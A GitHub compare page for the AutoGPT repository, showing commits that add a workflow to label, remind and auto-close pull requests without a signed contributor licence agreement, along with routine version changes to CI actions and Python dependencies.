Compare commits

..

8 Commits

Author SHA1 Message Date
Otto-AGPT
0f75c408f2 feat: only run CLA automation for PRs touching autogpt_platform/
CLA check still runs on all PRs (CLA-assistant config).
But label automation, reminders, and auto-close only apply to
platform code (Polyform Shield License).

Uses simple first-page check (per_page: 100) - covers 99%+ of PRs.
2026-02-06 20:04:29 +00:00
Otto-AGPT
b3e200f450 feat: replace check_run with status trigger for real-time CLA updates
CLA-assistant uses Status API, not Checks API, so check_run never fires.
- Added status event trigger
- Job-level guard: only runs if context == 'license/cla'
- Finds PRs by matching head SHA from status event
2026-02-06 19:36:31 +00:00
Otto-AGPT
9708ea3fd7 fix: address remaining review feedback
- Skip non-open PRs (closed/merged) early in loop
- Fix overlapping time windows: reminder only before warning period
- Add marker to close comment (prevents duplicates)
- Add 'cla: override' label support (maintainer bypass)
2026-02-06 19:35:44 +00:00
Otto-AGPT
46ed9a8b3c fix: address CodeRabbit review feedback
- Add checks:read permission for Checks API fallback
- Validate timing env vars (fail fast on NaN, warn on bad order)
- Remove unused prNumber param from getClaStatus()
2026-02-06 19:34:36 +00:00
Otto-AGPT
b309c018f0 fix: add statuses:read permission for commit status API
Required to read CLA check status via repos.getCombinedStatusForRef().
pull-requests:write does not include statuses:read per GitHub docs.
2026-02-06 19:32:07 +00:00
Otto-AGPT
abe47e845e fix: add pagination for PRs and comments
Addresses review feedback:
- Use github.paginate() for pulls.list to handle >100 open PRs
- Use github.paginate() for issues.listComments to handle >100 comments
- Prevents missing PRs in scheduled sweeps
- Prevents duplicate reminder comments on busy PRs
2026-02-06 19:22:21 +00:00
Otto-AGPT
c881510d09 fix: make close warning timing independently configurable
- Add CLOSE_WARNING_DAYS env var (separate from CLOSE_DAYS)
- Calculate days remaining dynamically in warning message
- Default timing: reminder at 3d, warning at 7d, close at 10d
2026-02-06 19:17:37 +00:00
Otto-AGPT
eccc26176c ci: add CLA label automation workflow
Adds a GitHub Actions workflow that:
- Creates 'cla: pending' and 'cla: signed' labels
- Auto-labels PRs based on CLA check status
- Posts reminder comment after 7 days if CLA unsigned
- Posts close warning at 23 days
- Auto-closes PRs after 30 days with unsigned CLA

Triggers:
- Real-time on check_run completion (license/cla)
- On PR open/sync/reopen
- Daily scheduled sweep at 9 AM UTC
- Manual workflow_dispatch for testing

Configurable timing via env vars (REMINDER_DAYS, CLOSE_DAYS).
2026-02-06 19:14:48 +00:00
259 changed files with 13661 additions and 22641 deletions

412
.github/workflows/cla-label-sync.yml vendored Normal file
View File

@@ -0,0 +1,412 @@
name: CLA Label Sync
on:
# Real-time: when CLA status changes (CLA-assistant uses Status API)
status:
# When PRs are opened or updated
pull_request_target:
types: [opened, synchronize, reopened]
# Scheduled sweep - check stale PRs daily
schedule:
- cron: '0 9 * * *' # 9 AM UTC daily
# Manual trigger for testing
workflow_dispatch:
inputs:
pr_number:
description: 'Specific PR number to check (optional)'
required: false
permissions:
pull-requests: write
contents: read
statuses: read
checks: read
env:
CLA_CHECK_NAME: 'license/cla'
LABEL_PENDING: 'cla: pending'
LABEL_SIGNED: 'cla: signed'
# Timing configuration (all independently configurable)
REMINDER_DAYS: 3 # Days before first reminder
CLOSE_WARNING_DAYS: 7 # Days before "closing soon" warning
CLOSE_DAYS: 10 # Days before auto-close
jobs:
sync-labels:
runs-on: ubuntu-latest
# Only run on status events if it's the CLA check
if: github.event_name != 'status' || github.event.context == 'license/cla'
steps:
- name: Ensure CLA labels exist
uses: actions/github-script@v7
with:
script: |
const labels = [
{ name: 'cla: pending', color: 'fbca04', description: 'CLA not yet signed by all contributors' },
{ name: 'cla: signed', color: '0e8a16', description: 'CLA signed by all contributors' }
];
for (const label of labels) {
try {
await github.rest.issues.getLabel({
owner: context.repo.owner,
repo: context.repo.repo,
name: label.name
});
} catch (e) {
if (e.status === 404) {
await github.rest.issues.createLabel({
owner: context.repo.owner,
repo: context.repo.repo,
name: label.name,
color: label.color,
description: label.description
});
console.log(`Created label: ${label.name}`);
}
}
}
- name: Sync CLA labels and handle stale PRs
uses: actions/github-script@v7
with:
script: |
const CLA_CHECK_NAME = process.env.CLA_CHECK_NAME;
const LABEL_PENDING = process.env.LABEL_PENDING;
const LABEL_SIGNED = process.env.LABEL_SIGNED;
const REMINDER_DAYS = parseInt(process.env.REMINDER_DAYS);
const CLOSE_WARNING_DAYS = parseInt(process.env.CLOSE_WARNING_DAYS);
const CLOSE_DAYS = parseInt(process.env.CLOSE_DAYS);
// Validate timing configuration
if ([REMINDER_DAYS, CLOSE_WARNING_DAYS, CLOSE_DAYS].some(Number.isNaN)) {
core.setFailed('Invalid timing configuration — REMINDER_DAYS, CLOSE_WARNING_DAYS, and CLOSE_DAYS must be numeric.');
return;
}
if (!(REMINDER_DAYS < CLOSE_WARNING_DAYS && CLOSE_WARNING_DAYS < CLOSE_DAYS)) {
core.warning(`Timing order looks odd: REMINDER(${REMINDER_DAYS}) < WARNING(${CLOSE_WARNING_DAYS}) < CLOSE(${CLOSE_DAYS}) expected.`);
}
const CLA_SIGN_URL = `https://cla-assistant.io/${context.repo.owner}/${context.repo.repo}`;
// Helper: Get CLA status for a commit
async function getClaStatus(headSha) {
// CLA-assistant uses the commit status API (not checks API)
const { data: statuses } = await github.rest.repos.getCombinedStatusForRef({
owner: context.repo.owner,
repo: context.repo.repo,
ref: headSha
});
const claStatus = statuses.statuses.find(
s => s.context === CLA_CHECK_NAME
);
if (claStatus) {
return {
found: true,
passed: claStatus.state === 'success',
state: claStatus.state,
description: claStatus.description
};
}
// Fallback: check the Checks API too
const { data: checkRuns } = await github.rest.checks.listForRef({
owner: context.repo.owner,
repo: context.repo.repo,
ref: headSha
});
const claCheck = checkRuns.check_runs.find(
check => check.name === CLA_CHECK_NAME
);
if (claCheck) {
return {
found: true,
passed: claCheck.conclusion === 'success',
state: claCheck.conclusion,
description: claCheck.output?.summary || ''
};
}
return { found: false, passed: false, state: 'unknown' };
}
// Helper: Check if bot already commented with a specific marker (paginated)
async function hasCommentWithMarker(prNumber, marker) {
// Use paginate to fetch ALL comments, not just first 100
const comments = await github.paginate(
github.rest.issues.listComments,
{
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: prNumber,
per_page: 100
}
);
return comments.some(c =>
c.user?.type === 'Bot' &&
c.body?.includes(marker)
);
}
// Helper: Days since a date
function daysSince(dateString) {
const date = new Date(dateString);
const now = new Date();
return Math.floor((now - date) / (1000 * 60 * 60 * 24));
}
// Determine which PRs to check
let prsToCheck = [];
if (context.eventName === 'status') {
// Status event from CLA-assistant - find PRs with this commit
const sha = context.payload.sha;
console.log(`Status event for SHA: ${sha}, context: ${context.payload.context}`);
// Search for open PRs with this head SHA
const { data: prs } = await github.rest.pulls.list({
owner: context.repo.owner,
repo: context.repo.repo,
state: 'open',
per_page: 100
});
prsToCheck = prs.filter(pr => pr.head.sha === sha).map(pr => pr.number);
if (prsToCheck.length === 0) {
console.log('No open PRs found with this SHA');
return;
}
} else if (context.eventName === 'pull_request_target') {
prsToCheck = [context.payload.pull_request.number];
} else if (context.eventName === 'workflow_dispatch' && context.payload.inputs?.pr_number) {
prsToCheck = [parseInt(context.payload.inputs.pr_number)];
} else {
// Scheduled run: check all open PRs (paginated to handle >100 PRs)
const openPRs = await github.paginate(
github.rest.pulls.list,
{
owner: context.repo.owner,
repo: context.repo.repo,
state: 'open',
per_page: 100
}
);
prsToCheck = openPRs.map(pr => pr.number);
}
console.log(`Checking ${prsToCheck.length} PR(s): ${prsToCheck.join(', ')}`);
for (const prNumber of prsToCheck) {
try {
// Get PR details
const { data: pr } = await github.rest.pulls.get({
owner: context.repo.owner,
repo: context.repo.repo,
pull_number: prNumber
});
// Skip if PR is from a bot
if (pr.user.type === 'Bot') {
console.log(`PR #${prNumber}: Skipping bot PR`);
continue;
}
// Skip if PR is not open (closed/merged)
if (pr.state !== 'open') {
console.log(`PR #${prNumber}: Skipping non-open PR (state=${pr.state})`);
continue;
}
// Skip if PR doesn't touch platform code (CLA automation only for autogpt_platform/)
const PLATFORM_PATH = 'autogpt_platform/';
const { data: files } = await github.rest.pulls.listFiles({
owner: context.repo.owner,
repo: context.repo.repo,
pull_number: prNumber,
per_page: 100
});
const touchesPlatform = files.some(f => f.filename.startsWith(PLATFORM_PATH));
if (!touchesPlatform) {
console.log(`PR #${prNumber}: Skipping - doesn't touch ${PLATFORM_PATH}`);
continue;
}
const claStatus = await getClaStatus(pr.head.sha);
const currentLabels = pr.labels.map(l => l.name);
const hasPending = currentLabels.includes(LABEL_PENDING);
const hasSigned = currentLabels.includes(LABEL_SIGNED);
const prAgeDays = daysSince(pr.created_at);
console.log(`PR #${prNumber}: CLA ${claStatus.passed ? 'passed' : 'pending'} (${claStatus.state}), age: ${prAgeDays} days`);
if (claStatus.passed) {
// ✅ CLA signed - add signed label, remove pending
if (!hasSigned) {
await github.rest.issues.addLabels({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: prNumber,
labels: [LABEL_SIGNED]
});
console.log(`Added '${LABEL_SIGNED}' to PR #${prNumber}`);
}
if (hasPending) {
await github.rest.issues.removeLabel({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: prNumber,
name: LABEL_PENDING
});
console.log(`Removed '${LABEL_PENDING}' from PR #${prNumber}`);
}
} else {
// ⏳ CLA pending
// Add pending label if not present
if (!hasPending) {
await github.rest.issues.addLabels({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: prNumber,
labels: [LABEL_PENDING]
});
console.log(`Added '${LABEL_PENDING}' to PR #${prNumber}`);
}
if (hasSigned) {
await github.rest.issues.removeLabel({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: prNumber,
name: LABEL_SIGNED
});
console.log(`Removed '${LABEL_SIGNED}' from PR #${prNumber}`);
}
// Check if we need to send reminder or close
const REMINDER_MARKER = '<!-- cla-reminder -->';
const CLOSE_WARNING_MARKER = '<!-- cla-close-warning -->';
// 📢 Reminder after REMINDER_DAYS (but before warning window)
if (prAgeDays >= REMINDER_DAYS && prAgeDays < CLOSE_WARNING_DAYS) {
const hasReminder = await hasCommentWithMarker(prNumber, REMINDER_MARKER);
if (!hasReminder) {
await github.rest.issues.createComment({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: prNumber,
body: `${REMINDER_MARKER}
👋 **Friendly reminder:** This PR is waiting on a signed CLA.
All contributors need to sign our Contributor License Agreement before we can merge this PR.
**➡️ [Sign the CLA here](${CLA_SIGN_URL}?pullRequest=${prNumber})**
<details>
<summary>Why do we need a CLA?</summary>
The CLA protects both you and the project by clarifying the terms under which your contribution is made. It's a one-time process — once signed, it covers all your future contributions.
</details>
<details>
<summary>Common issues</summary>
- **Email mismatch:** Make sure your Git commit email matches your GitHub account email
- **Merge commits:** If you merged \`dev\` into your branch, try rebasing instead: \`git rebase origin/dev && git push --force-with-lease\`
- **Multiple authors:** All commit authors need to sign, not just the PR author
</details>
If you have questions, just ask! 🙂`
});
console.log(`Posted reminder on PR #${prNumber}`);
}
}
// ⚠️ Close warning at CLOSE_WARNING_DAYS
if (prAgeDays >= CLOSE_WARNING_DAYS && prAgeDays < CLOSE_DAYS) {
const hasCloseWarning = await hasCommentWithMarker(prNumber, CLOSE_WARNING_MARKER);
if (!hasCloseWarning) {
const daysRemaining = CLOSE_DAYS - prAgeDays;
await github.rest.issues.createComment({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: prNumber,
body: `${CLOSE_WARNING_MARKER}
⚠️ **This PR will be automatically closed in ${daysRemaining} day${daysRemaining === 1 ? '' : 's'}** if the CLA is not signed.
We haven't received a signed CLA from all contributors yet. Please sign it to keep this PR open:
**➡️ [Sign the CLA here](${CLA_SIGN_URL}?pullRequest=${prNumber})**
If you're unable to sign or have questions, please let us know — we're happy to help!`
});
console.log(`Posted close warning on PR #${prNumber}`);
}
}
// 🚪 Auto-close after CLOSE_DAYS
if (prAgeDays >= CLOSE_DAYS) {
const CLOSE_MARKER = '<!-- cla-auto-closed -->';
const OVERRIDE_LABEL = 'cla: override';
// Check for override label (maintainer wants to keep PR open)
if (currentLabels.includes(OVERRIDE_LABEL)) {
console.log(`PR #${prNumber}: Skipping close due to '${OVERRIDE_LABEL}' label`);
} else {
// Check if we already posted a close comment
const hasCloseComment = await hasCommentWithMarker(prNumber, CLOSE_MARKER);
if (!hasCloseComment) {
await github.rest.issues.createComment({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: prNumber,
body: `${CLOSE_MARKER}
👋 Closing this PR due to unsigned CLA after ${CLOSE_DAYS} days.
Thank you for your contribution! If you'd still like to contribute:
1. [Sign the CLA](${CLA_SIGN_URL})
2. Re-open this PR or create a new one
We appreciate your interest in AutoGPT and hope to see you back! 🚀`
});
}
await github.rest.pulls.update({
owner: context.repo.owner,
repo: context.repo.repo,
pull_number: prNumber,
state: 'closed'
});
console.log(`Closed PR #${prNumber} due to unsigned CLA`);
}
}
}
} catch (error) {
console.error(`Error processing PR #${prNumber}: ${error.message}`);
}
}
console.log('CLA label sync complete!');

View File

@@ -49,7 +49,7 @@ jobs:
- name: Create PR ${{ env.BUILD_BRANCH }} -> ${{ github.ref_name }}
if: github.event_name == 'push'
uses: peter-evans/create-pull-request@v8
uses: peter-evans/create-pull-request@v7
with:
add-paths: classic/frontend/build/web
base: ${{ github.ref_name }}

View File

@@ -22,7 +22,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
ref: ${{ github.event.workflow_run.head_branch }}
fetch-depth: 0
@@ -42,7 +42,7 @@ jobs:
- name: Get CI failure details
id: failure_details
uses: actions/github-script@v8
uses: actions/github-script@v7
with:
script: |
const run = await github.rest.actions.getWorkflowRun({

View File

@@ -30,7 +30,7 @@ jobs:
actions: read # Required for CI access
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
fetch-depth: 1
@@ -41,7 +41,7 @@ jobs:
python-version: "3.11" # Use standard version matching CI
- name: Set up Python dependency cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.cache/pypoetry
key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -78,7 +78,7 @@ jobs:
# Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22"
@@ -91,7 +91,7 @@ jobs:
echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV
- name: Cache frontend dependencies
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -124,7 +124,7 @@ jobs:
# Phase 1: Cache and load Docker images for faster setup
- name: Set up Docker image cache
id: docker-cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/docker-cache
# Use a versioned key for cache invalidation when image list changes
@@ -309,7 +309,6 @@ jobs:
uses: anthropics/claude-code-action@v1
with:
claude_code_oauth_token: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
allowed_bots: "dependabot[bot]"
claude_args: |
--allowedTools "Bash(npm:*),Bash(pnpm:*),Bash(poetry:*),Bash(git:*),Edit,Replace,NotebookEditCell,mcp__github_inline_comment__create_inline_comment,Bash(gh pr comment:*), Bash(gh pr diff:*), Bash(gh pr view:*)"
prompt: |

View File

@@ -40,7 +40,7 @@ jobs:
actions: read # Required for CI access
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
fetch-depth: 1
@@ -57,7 +57,7 @@ jobs:
python-version: "3.11" # Use standard version matching CI
- name: Set up Python dependency cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.cache/pypoetry
key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -94,7 +94,7 @@ jobs:
# Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22"
@@ -107,7 +107,7 @@ jobs:
echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV
- name: Cache frontend dependencies
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -140,7 +140,7 @@ jobs:
# Phase 1: Cache and load Docker images for faster setup
- name: Set up Docker image cache
id: docker-cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/docker-cache
# Use a versioned key for cache invalidation when image list changes

View File

@@ -58,7 +58,7 @@ jobs:
# your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL

View File

@@ -27,7 +27,7 @@ jobs:
# If you do not check out your code, Copilot will do this for you.
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
fetch-depth: 0
submodules: true
@@ -39,7 +39,7 @@ jobs:
python-version: "3.11" # Use standard version matching CI
- name: Set up Python dependency cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.cache/pypoetry
key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}
@@ -76,7 +76,7 @@ jobs:
# Frontend Node.js/pnpm setup (mirrors platform-frontend-ci.yml)
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22"
@@ -89,7 +89,7 @@ jobs:
echo "PNPM_HOME=$HOME/.pnpm-store" >> $GITHUB_ENV
- name: Cache frontend dependencies
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}
@@ -132,7 +132,7 @@ jobs:
# Phase 1: Cache and load Docker images for faster setup
- name: Set up Docker image cache
id: docker-cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/docker-cache
# Use a versioned key for cache invalidation when image list changes

View File

@@ -23,7 +23,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
fetch-depth: 1
@@ -33,7 +33,7 @@ jobs:
python-version: "3.11"
- name: Set up Python dependency cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.cache/pypoetry
key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}

View File

@@ -23,7 +23,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
fetch-depth: 0
@@ -33,7 +33,7 @@ jobs:
python-version: "3.11"
- name: Set up Python dependency cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.cache/pypoetry
key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}

View File

@@ -28,7 +28,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
fetch-depth: 1
@@ -38,7 +38,7 @@ jobs:
python-version: "3.11"
- name: Set up Python dependency cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.cache/pypoetry
key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}

View File

@@ -25,7 +25,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
ref: ${{ github.event.inputs.git_ref || github.ref_name }}
@@ -52,7 +52,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Trigger deploy workflow
uses: peter-evans/repository-dispatch@v4
uses: peter-evans/repository-dispatch@v3
with:
token: ${{ secrets.DEPLOY_TOKEN }}
repository: Significant-Gravitas/AutoGPT_cloud_infrastructure

View File

@@ -17,7 +17,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
ref: ${{ github.ref_name || 'master' }}
@@ -45,7 +45,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Trigger deploy workflow
uses: peter-evans/repository-dispatch@v4
uses: peter-evans/repository-dispatch@v3
with:
token: ${{ secrets.DEPLOY_TOKEN }}
repository: Significant-Gravitas/AutoGPT_cloud_infrastructure

View File

@@ -68,7 +68,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
fetch-depth: 0
submodules: true
@@ -88,7 +88,7 @@ jobs:
run: echo "date=$(date +'%Y-%m-%d')" >> $GITHUB_OUTPUT
- name: Set up Python dependency cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.cache/pypoetry
key: poetry-${{ runner.os }}-${{ hashFiles('autogpt_platform/backend/poetry.lock') }}

View File

@@ -17,7 +17,7 @@ jobs:
- name: Check comment permissions and deployment status
id: check_status
if: github.event_name == 'issue_comment' && github.event.issue.pull_request
uses: actions/github-script@v8
uses: actions/github-script@v7
with:
script: |
const commentBody = context.payload.comment.body.trim();
@@ -55,7 +55,7 @@ jobs:
- name: Post permission denied comment
if: steps.check_status.outputs.permission_denied == 'true'
uses: actions/github-script@v8
uses: actions/github-script@v7
with:
script: |
await github.rest.issues.createComment({
@@ -68,7 +68,7 @@ jobs:
- name: Get PR details for deployment
id: pr_details
if: steps.check_status.outputs.should_deploy == 'true' || steps.check_status.outputs.should_undeploy == 'true'
uses: actions/github-script@v8
uses: actions/github-script@v7
with:
script: |
const pr = await github.rest.pulls.get({
@@ -82,7 +82,7 @@ jobs:
- name: Dispatch Deploy Event
if: steps.check_status.outputs.should_deploy == 'true'
uses: peter-evans/repository-dispatch@v4
uses: peter-evans/repository-dispatch@v3
with:
token: ${{ secrets.DISPATCH_TOKEN }}
repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -98,7 +98,7 @@ jobs:
- name: Post deploy success comment
if: steps.check_status.outputs.should_deploy == 'true'
uses: actions/github-script@v8
uses: actions/github-script@v7
with:
script: |
await github.rest.issues.createComment({
@@ -110,7 +110,7 @@ jobs:
- name: Dispatch Undeploy Event (from comment)
if: steps.check_status.outputs.should_undeploy == 'true'
uses: peter-evans/repository-dispatch@v4
uses: peter-evans/repository-dispatch@v3
with:
token: ${{ secrets.DISPATCH_TOKEN }}
repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -126,7 +126,7 @@ jobs:
- name: Post undeploy success comment
if: steps.check_status.outputs.should_undeploy == 'true'
uses: actions/github-script@v8
uses: actions/github-script@v7
with:
script: |
await github.rest.issues.createComment({
@@ -139,7 +139,7 @@ jobs:
- name: Check deployment status on PR close
id: check_pr_close
if: github.event_name == 'pull_request' && github.event.action == 'closed'
uses: actions/github-script@v8
uses: actions/github-script@v7
with:
script: |
const comments = await github.rest.issues.listComments({
@@ -168,7 +168,7 @@ jobs:
github.event_name == 'pull_request' &&
github.event.action == 'closed' &&
steps.check_pr_close.outputs.should_undeploy == 'true'
uses: peter-evans/repository-dispatch@v4
uses: peter-evans/repository-dispatch@v3
with:
token: ${{ secrets.DISPATCH_TOKEN }}
repository: Significant-Gravitas/AutoGPT_cloud_infrastructure
@@ -187,7 +187,7 @@ jobs:
github.event_name == 'pull_request' &&
github.event.action == 'closed' &&
steps.check_pr_close.outputs.should_undeploy == 'true'
uses: actions/github-script@v8
uses: actions/github-script@v7
with:
script: |
await github.rest.issues.createComment({

View File

@@ -31,7 +31,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
- name: Check for component changes
uses: dorny/paths-filter@v3
@@ -42,7 +42,7 @@ jobs:
- 'autogpt_platform/frontend/src/components/**'
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22.18.0"
@@ -54,7 +54,7 @@ jobs:
run: echo "key=${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}" >> $GITHUB_OUTPUT
- name: Cache dependencies
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ steps.cache-key.outputs.key }}
@@ -71,10 +71,10 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22.18.0"
@@ -82,7 +82,7 @@ jobs:
run: corepack enable
- name: Restore dependencies cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ needs.setup.outputs.cache-key }}
@@ -107,12 +107,12 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22.18.0"
@@ -120,7 +120,7 @@ jobs:
run: corepack enable
- name: Restore dependencies cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ needs.setup.outputs.cache-key }}
@@ -148,12 +148,12 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
submodules: recursive
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22.18.0"
@@ -176,7 +176,7 @@ jobs:
uses: docker/setup-buildx-action@v3
- name: Cache Docker layers
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: /tmp/.buildx-cache
key: ${{ runner.os }}-buildx-frontend-test-${{ hashFiles('autogpt_platform/docker-compose.yml', 'autogpt_platform/backend/Dockerfile', 'autogpt_platform/backend/pyproject.toml', 'autogpt_platform/backend/poetry.lock') }}
@@ -231,7 +231,7 @@ jobs:
fi
- name: Restore dependencies cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ needs.setup.outputs.cache-key }}
@@ -277,12 +277,12 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
submodules: recursive
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22.18.0"
@@ -290,7 +290,7 @@ jobs:
run: corepack enable
- name: Restore dependencies cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ needs.setup.outputs.cache-key }}

View File

@@ -29,10 +29,10 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22.18.0"
@@ -44,7 +44,7 @@ jobs:
run: echo "key=${{ runner.os }}-pnpm-${{ hashFiles('autogpt_platform/frontend/pnpm-lock.yaml', 'autogpt_platform/frontend/package.json') }}" >> $GITHUB_OUTPUT
- name: Cache dependencies
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ steps.cache-key.outputs.key }}
@@ -56,19 +56,19 @@ jobs:
run: pnpm install --frozen-lockfile
types:
runs-on: big-boi
runs-on: ubuntu-latest
needs: setup
strategy:
fail-fast: false
steps:
- name: Checkout repository
uses: actions/checkout@v6
uses: actions/checkout@v4
with:
submodules: recursive
- name: Set up Node.js
uses: actions/setup-node@v6
uses: actions/setup-node@v4
with:
node-version: "22.18.0"
@@ -85,10 +85,10 @@ jobs:
- name: Run docker compose
run: |
docker compose -f ../docker-compose.yml --profile local up -d deps_backend
docker compose -f ../docker-compose.yml --profile local --profile deps_backend up -d
- name: Restore dependencies cache
uses: actions/cache@v5
uses: actions/cache@v4
with:
path: ~/.pnpm-store
key: ${{ needs.setup.outputs.cache-key }}

View File

@@ -11,7 +11,7 @@ jobs:
steps:
# - name: Wait some time for all actions to start
# run: sleep 30
- uses: actions/checkout@v6
- uses: actions/checkout@v4
# with:
# fetch-depth: 0
- name: Set up Python

File diff suppressed because it is too large Load Diff

View File

@@ -9,25 +9,25 @@ packages = [{ include = "autogpt_libs" }]
[tool.poetry.dependencies]
python = ">=3.10,<4.0"
colorama = "^0.4.6"
cryptography = "^46.0"
cryptography = "^45.0"
expiringdict = "^1.2.2"
fastapi = "^0.128.0"
google-cloud-logging = "^3.13.0"
launchdarkly-server-sdk = "^9.14.1"
pydantic = "^2.12.5"
pydantic-settings = "^2.12.0"
pyjwt = { version = "^2.11.0", extras = ["crypto"] }
fastapi = "^0.116.1"
google-cloud-logging = "^3.12.1"
launchdarkly-server-sdk = "^9.12.0"
pydantic = "^2.11.7"
pydantic-settings = "^2.10.1"
pyjwt = { version = "^2.10.1", extras = ["crypto"] }
redis = "^6.2.0"
supabase = "^2.27.2"
uvicorn = "^0.40.0"
supabase = "^2.16.0"
uvicorn = "^0.35.0"
[tool.poetry.group.dev.dependencies]
pyright = "^1.1.408"
pyright = "^1.1.404"
pytest = "^8.4.1"
pytest-asyncio = "^1.3.0"
pytest-mock = "^3.15.1"
pytest-cov = "^7.0.0"
ruff = "^0.15.0"
pytest-asyncio = "^1.1.0"
pytest-mock = "^3.14.1"
pytest-cov = "^6.2.1"
ruff = "^0.12.11"
[build-system]
requires = ["poetry-core"]

View File

@@ -62,16 +62,12 @@ ENV POETRY_HOME=/opt/poetry \
DEBIAN_FRONTEND=noninteractive
ENV PATH=/opt/poetry/bin:$PATH
# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
